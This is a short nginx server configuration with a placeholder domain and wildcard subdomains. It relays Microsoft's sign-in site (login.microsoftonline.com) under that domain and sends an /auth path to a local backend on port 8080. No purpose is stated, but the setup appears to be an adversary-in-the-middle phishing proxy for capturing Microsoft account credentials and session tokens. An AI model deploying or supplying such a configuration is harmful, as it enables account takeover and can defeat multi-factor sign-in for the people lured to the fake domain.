server {
    listen 80;
    server_name YOUR_DOMAIN *.YOUR_DOMAIN;

    location / {
        proxy_pass https://login.microsoftonline.com;
        proxy_set_header Host login.microsoftonline.com;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_buffering off;
        proxy_redirect off;
    }

    location /auth {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
    }
}
